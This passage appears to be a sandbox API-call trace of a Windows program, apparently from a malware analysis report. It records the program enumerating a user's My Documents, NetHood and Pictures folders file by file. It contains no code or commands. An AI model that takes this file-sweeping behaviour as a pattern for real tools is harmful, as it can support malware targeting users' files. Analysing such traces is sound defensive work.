dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3 ErXRNCe_-x.wav", cAlternateFileName="3ERXRN~1.WAV")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fa5daf0, ftCreationTime.dwHighDateTime=0x1d5baee, ftLastAccessTime.dwLowDateTime=0xaeedd990, ftLastAccessTime.dwHighDateTime=0x1d5b93b, ftLastWriteTime.dwLowDateTime=0xaeedd990, ftLastWriteTime.dwHighDateTime=0x1d5b93b, nFileSizeHigh=0x0, nFileSizeLow=0x52df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cKhQfnc9b5ul_vPwo.m4a", cAlternateFileName="CKHQFN~1.M4A")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37275470, ftCreationTime.dwHighDateTime=0x1d5bae1, ftLastAccessTime.dwLowDateTime=0x57721b0, ftLastAccessTime.dwHighDateTime=0x1d5bd04, ftLastWriteTime.dwLowDateTime=0x57721b0, ftLastWriteTime.dwHighDateTime=0x1d5bd04, nFileSizeHigh=0x0, nFileSizeLow=0x15ffe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gWe58.mp3", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d353ea0, ftCreationTime.dwHighDateTime=0x1d5b82c, ftLastAccessTime.dwLowDateTime=0x517d2750, ftLastAccessTime.dwHighDateTime=0x1d5bef1, ftLastWriteTime.dwLowDateTime=0x517d2750, ftLastWriteTime.dwHighDateTime=0x1d5bef1, nFileSizeHigh=0x0, nFileSizeLow=0x4eee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gXSOfYbcO.wav", cAlternateFileName="GXSOFY~1.WAV")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad578d80, ftCreationTime.dwHighDateTime=0x1d5bb7d, ftLastAccessTime.dwLowDateTime=0x18cfc610, ftLastAccessTime.dwHighDateTime=0x1d5bbcc, ftLastWriteTime.dwLowDateTime=0x18cfc610, ftLastWriteTime.dwHighDateTime=0x1d5bbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jnsPq9bVvOwQR", cAlternateFileName="JNSPQ9~1")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffbf420, ftCreationTime.dwHighDateTime=0x1d5b6b0, ftLastAccessTime.dwLowDateTime=0xfa642b20, ftLastAccessTime.dwHighDateTime=0x1d5bf82, ftLastWriteTime.dwLowDateTime=0xfa642b20, ftLastWriteTime.dwHighDateTime=0x1d5bf82, nFileSizeHigh=0x0, nFileSizeLow=0x9aa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lQleP8ZqnzS.mp3", cAlternateFileName="LQLEP8~1.MP3")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc11c8600, ftCreationTime.dwHighDateTime=0x1d5b618, ftLastAccessTime.dwLowDateTime=0xbd26b870, ftLastAccessTime.dwHighDateTime=0x1d5ba02, ftLastWriteTime.dwLowDateTime=0xbd26b870, ftLastWriteTime.dwHighDateTime=0x1d5ba02, nFileSizeHigh=0x0, nFileSizeLow=0x14dc9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NRpZg_.mp3", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66350c40, ftCreationTime.dwHighDateTime=0x1d5bcb6, ftLastAccessTime.dwLowDateTime=0x129740b0, ftLastAccessTime.dwHighDateTime=0x1d5b9b1, ftLastWriteTime.dwLowDateTime=0x129740b0, ftLastWriteTime.dwHighDateTime=0x1d5b9b1, nFileSizeHigh=0x0, nFileSizeLow=0x1045c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uaPM.m4a", cAlternateFileName="")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14e70f70, ftCreationTime.dwHighDateTime=0x1d5be17, ftLastAccessTime.dwLowDateTime=0x7708e7a0, ftLastAccessTime.dwHighDateTime=0x1d5be49, ftLastWriteTime.dwLowDateTime=0x7708e7a0, ftLastWriteTime.dwHighDateTime=0x1d5be49, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vzirrPIdRoa4G1GJ", cAlternateFileName="VZIRRP~1")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a3d8c60, ftCreationTime.dwHighDateTime=0x1d5bfd5, ftLastAccessTime.dwLowDateTime=0x9cb2a750, ftLastAccessTime.dwHighDateTime=0x1d5bb1c, ftLastWriteTime.dwLowDateTime=0x9cb2a750, ftLastWriteTime.dwHighDateTime=0x1d5bb1c, nFileSizeHigh=0x0, nFileSizeLow=0xb6c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wNcyJIAdvLtk.wav", cAlternateFileName="WNCYJI~1.WAV")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a5d60, ftCreationTime.dwHighDateTime=0x1d5b7d1, ftLastAccessTime.dwLowDateTime=0x28ad08d0, ftLastAccessTime.dwHighDateTime=0x1d5b682, ftLastWriteTime.dwLowDateTime=0x28ad08d0, ftLastWriteTime.dwHighDateTime=0x1d5b682, nFileSizeHigh=0x0, nFileSizeLow=0x13291, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X_R1U00TmV8k4bEDrEW.mp3", cAlternateFileName="X_R1U0~1.MP3")) returned 1 [0094.276] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 1 [0094.277] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 0 [0094.277] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.277] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.277] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0094.277] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.277] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.277] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.277] PathFindFileNameW (pszPath="") returned="" [0094.277] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 0xffffffff [0094.278] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0094.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.278] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.278] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.278] PathFindFileNameW (pszPath="") returned="" [0094.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 0xffffffff [0094.278] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0094.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.278] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.279] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.279] PathFindFileNameW (pszPath="") returned="" [0094.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce478 [0094.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa04896b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa04896b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce478 | out: hHeap=0x630000) returned 1 [0094.279] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa04896b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa04896b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.279] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaacc150, ftCreationTime.dwHighDateTime=0x1d5c420, ftLastAccessTime.dwLowDateTime=0xb6be4ba0, ftLastAccessTime.dwHighDateTime=0x1d5c1ba, ftLastWriteTime.dwLowDateTime=0xb6be4ba0, ftLastWriteTime.dwHighDateTime=0x1d5c1ba, nFileSizeHigh=0x0, nFileSizeLow=0x137ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-DReH91mc.jpg", cAlternateFileName="-DREH9~1.JPG")) returned 1 [0094.279] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb57469e0, ftCreationTime.dwHighDateTime=0x1d5b81f, ftLastAccessTime.dwLowDateTime=0xfd8d61f0, ftLastAccessTime.dwHighDateTime=0x1d5c1cf, ftLastWriteTime.dwLowDateTime=0xfd8d61f0, ftLastWriteTime.dwHighDateTime=0x1d5c1cf, nFileSizeHigh=0x0, nFileSizeLow=0xdb48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0yU28tc546iJ81.jpg", cAlternateFileName="0YU28T~1.JPG")) returned 1 [0094.279] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e43e10, ftCreationTime.dwHighDateTime=0x1d5be46, ftLastAccessTime.dwLowDateTime=0x6c0c3f60, ftLastAccessTime.dwHighDateTime=0x1d5bbbe, ftLastWriteTime.dwLowDateTime=0x6c0c3f60, ftLastWriteTime.dwHighDateTime=0x1d5bbbe, nFileSizeHigh=0x0, nFileSizeLow=0xd9aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4gJpk _7JzbYAnh6P1h.png", cAlternateFileName="4GJPK_~1.PNG")) returned 1 [0094.279] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7669b70, ftCreationTime.dwHighDateTime=0x1d5bc27, ftLastAccessTime.dwLowDateTime=0x8c6bf8c0, ftLastAccessTime.dwHighDateTime=0x1d5c566, ftLastWriteTime.dwLowDateTime=0x8c6bf8c0, ftLastWriteTime.dwHighDateTime=0x1d5c566, nFileSizeHigh=0x0, nFileSizeLow=0x83d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5T6c_NBU.gif", cAlternateFileName="")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d63100, ftCreationTime.dwHighDateTime=0x1d5bc89, ftLastAccessTime.dwLowDateTime=0x27870be0, ftLastAccessTime.dwHighDateTime=0x1d5bc13, ftLastWriteTime.dwLowDateTime=0x27870be0, ftLastWriteTime.dwHighDateTime=0x1d5bc13, nFileSizeHigh=0x0, nFileSizeLow=0x85de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6sxsnfrZ.jpg", cAlternateFileName="")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd0ad910, ftCreationTime.dwHighDateTime=0x1d5b8af, ftLastAccessTime.dwLowDateTime=0x223c82d0, ftLastAccessTime.dwHighDateTime=0x1d5ba62, ftLastWriteTime.dwLowDateTime=0x223c82d0, ftLastWriteTime.dwHighDateTime=0x1d5ba62, nFileSizeHigh=0x0, nFileSizeLow=0xd841, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="811SACyKM33.gif", cAlternateFileName="811SAC~1.GIF")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc895e70, ftCreationTime.dwHighDateTime=0x1d5c202, ftLastAccessTime.dwLowDateTime=0x6937af20, ftLastAccessTime.dwHighDateTime=0x1d5c2af, ftLastWriteTime.dwLowDateTime=0x6937af20, ftLastWriteTime.dwHighDateTime=0x1d5c2af, nFileSizeHigh=0x0, nFileSizeLow=0x18c9f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9q1Th.jpg", cAlternateFileName="")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x960af140, ftCreationTime.dwHighDateTime=0x1d5bc76, ftLastAccessTime.dwLowDateTime=0x5485b20, ftLastAccessTime.dwHighDateTime=0x1d5be65, ftLastWriteTime.dwLowDateTime=0x5485b20, ftLastWriteTime.dwHighDateTime=0x1d5be65, nFileSizeHigh=0x0, nFileSizeLow=0x16aa0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a wV.png", cAlternateFileName="AWV~1.PNG")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e06f10, ftCreationTime.dwHighDateTime=0x1d5bea0, ftLastAccessTime.dwLowDateTime=0xf2792150, ftLastAccessTime.dwHighDateTime=0x1d5bfb8, ftLastWriteTime.dwLowDateTime=0xf2792150, ftLastWriteTime.dwHighDateTime=0x1d5bfb8, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AFUgSZtz3g.jpg", cAlternateFileName="AFUGSZ~1.JPG")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95cb6900, ftCreationTime.dwHighDateTime=0x1d5b65c, ftLastAccessTime.dwLowDateTime=0xa9524b00, ftLastAccessTime.dwHighDateTime=0x1d5c2a6, ftLastWriteTime.dwLowDateTime=0xa9524b00, ftLastWriteTime.dwHighDateTime=0x1d5c2a6, nFileSizeHigh=0x0, nFileSizeLow=0xdb27, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bigTpE.jpg", cAlternateFileName="")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1924b830, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0xa3cda770, ftLastAccessTime.dwHighDateTime=0x1d5bcc9, ftLastWriteTime.dwLowDateTime=0xa3cda770, ftLastWriteTime.dwHighDateTime=0x1d5bcc9, nFileSizeHigh=0x0, nFileSizeLow=0xe3e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B_pNpXiarzzW85.gif", cAlternateFileName="B_PNPX~1.GIF")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe813a010, ftCreationTime.dwHighDateTime=0x1d5c1fb, ftLastAccessTime.dwLowDateTime=0x96505800, ftLastAccessTime.dwHighDateTime=0x1d5b67e, ftLastWriteTime.dwLowDateTime=0x96505800, ftLastWriteTime.dwHighDateTime=0x1d5b67e, nFileSizeHigh=0x0, nFileSizeLow=0xe71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cIdoFCqOwklL.jpg", cAlternateFileName="CIDOFC~1.JPG")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x408ae940, ftCreationTime.dwHighDateTime=0x1d5b952, ftLastAccessTime.dwLowDateTime=0xc428d4f0, ftLastAccessTime.dwHighDateTime=0x1d5bec6, ftLastWriteTime.dwLowDateTime=0xc428d4f0, ftLastWriteTime.dwHighDateTime=0x1d5bec6, nFileSizeHigh=0x0, nFileSizeLow=0x6798, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EMAWy8841S2yxXM_lme.bmp", cAlternateFileName="EMAWY8~1.BMP")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b71a340, ftCreationTime.dwHighDateTime=0x1d5b748, ftLastAccessTime.dwLowDateTime=0xcbc9ab60, ftLastAccessTime.dwHighDateTime=0x1d5ba27, ftLastWriteTime.dwLowDateTime=0xcbc9ab60, ftLastWriteTime.dwHighDateTime=0x1d5ba27, nFileSizeHigh=0x0, nFileSizeLow=0xbda2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E_8Yzp r8pR.bmp", cAlternateFileName="E_8YZP~1.BMP")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf2a6a0, ftCreationTime.dwHighDateTime=0x1d5b8df, ftLastAccessTime.dwLowDateTime=0x1e5814d0, ftLastAccessTime.dwHighDateTime=0x1d5be14, ftLastWriteTime.dwLowDateTime=0x1e5814d0, ftLastWriteTime.dwHighDateTime=0x1d5be14, nFileSizeHigh=0x0, nFileSizeLow=0xc14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fUPXPZWHl.gif", cAlternateFileName="FUPXPZ~1.GIF")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3afeb10, ftCreationTime.dwHighDateTime=0x1d5b9fc, ftLastAccessTime.dwLowDateTime=0x674a96b0, ftLastAccessTime.dwHighDateTime=0x1d5b89f, ftLastWriteTime.dwLowDateTime=0x674a96b0, ftLastWriteTime.dwHighDateTime=0x1d5b89f, nFileSizeHigh=0x0, nFileSizeLow=0x742f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g rH3yFllhG.gif", cAlternateFileName="GRH3YF~1.GIF")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfae9b0b0, ftCreationTime.dwHighDateTime=0x1d5c0f4, ftLastAccessTime.dwLowDateTime=0xebdf6d00, ftLastAccessTime.dwHighDateTime=0x1d5bef9, ftLastWriteTime.dwLowDateTime=0xebdf6d00, ftLastWriteTime.dwHighDateTime=0x1d5bef9, nFileSizeHigh=0x0, nFileSizeLow=0x10bcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G39vaCnIqVU1.bmp", cAlternateFileName="G39VAC~1.BMP")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32121230, ftCreationTime.dwHighDateTime=0x1d5b67d, ftLastAccessTime.dwLowDateTime=0xe8713a80, ftLastAccessTime.dwHighDateTime=0x1d5bad6, ftLastWriteTime.dwLowDateTime=0xe8713a80, ftLastWriteTime.dwHighDateTime=0x1d5bad6, nFileSizeHigh=0x0, nFileSizeLow=0x43ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GFp qsQfQOaQJIpyl58.bmp", cAlternateFileName="GFPQSQ~1.BMP")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392fbdb0, ftCreationTime.dwHighDateTime=0x1d5bfba, ftLastAccessTime.dwLowDateTime=0x6ab4c710, ftLastAccessTime.dwHighDateTime=0x1d5b98c, ftLastWriteTime.dwLowDateTime=0x6ab4c710, ftLastWriteTime.dwHighDateTime=0x1d5b98c, nFileSizeHigh=0x0, nFileSizeLow=0x8489, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hz5MGP.gif", cAlternateFileName="")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f7d8d30, ftCreationTime.dwHighDateTime=0x1d5be35, ftLastAccessTime.dwLowDateTime=0x93c0aab0, ftLastAccessTime.dwHighDateTime=0x1d5b866, ftLastWriteTime.dwLowDateTime=0x93c0aab0, ftLastWriteTime.dwHighDateTime=0x1d5b866, nFileSizeHigh=0x0, nFileSizeLow=0x109b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJKK_.gif", cAlternateFileName="")) returned 1 [0094.280] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x832a98d0, ftCreationTime.dwHighDateTime=0x1d5be6c, ftLastAccessTime.dwLowDateTime=0x19feb1a0, ftLastAccessTime.dwHighDateTime=0x1d5bca7, ftLastWriteTime.dwLowDateTime=0x19feb1a0, ftLastWriteTime.dwHighDateTime=0x1d5bca7, nFileSizeHigh=0x0, nFileSizeLow=0x70af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lrp6Blp6FKC5uB.png", cAlternateFileName="LRP6BL~1.PNG")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e54840, ftCreationTime.dwHighDateTime=0x1d5b7bf, ftLastAccessTime.dwLowDateTime=0x3520d1d0, ftLastAccessTime.dwHighDateTime=0x1d5c08e, ftLastWriteTime.dwLowDateTime=0x3520d1d0, ftLastWriteTime.dwHighDateTime=0x1d5c08e, nFileSizeHigh=0x0, nFileSizeLow=0xe053, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oI-TD-U-0TkXRG.bmp", cAlternateFileName="OI-TD-~1.BMP")) returned 1 [0094.281] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, 